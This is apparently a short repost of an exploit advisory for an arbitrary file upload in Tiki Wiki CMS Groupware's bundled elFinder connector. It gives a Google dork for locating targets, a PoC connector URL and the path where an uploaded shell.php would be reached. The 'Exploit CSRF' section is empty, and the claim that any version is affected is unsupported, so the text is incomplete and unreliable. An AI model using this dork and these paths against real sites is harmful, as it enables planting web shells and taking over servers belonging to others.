Unknown On 24/09/16


# Exploit Title: Tiki Wiki CMS Groupware Arbitrary File Upload
# Google Dork: intext:Tiki Wiki CMS Groupware - https://tiki.org
# Date: 24/09/2016
# Software Link: https://tiki.org/
# Version: Any Version
# Tested on: Windows
# Author : AnoaGhost

Exploit CSRF :



Poc :
http://site.com/path/vendor_extra/elfinder/php/connector.php


Shell Path :
http://site.com/path/vendor_extra/elfinder/files/shell.php

Leave a Reply

Subscribe to Posts | Subscribe to Comments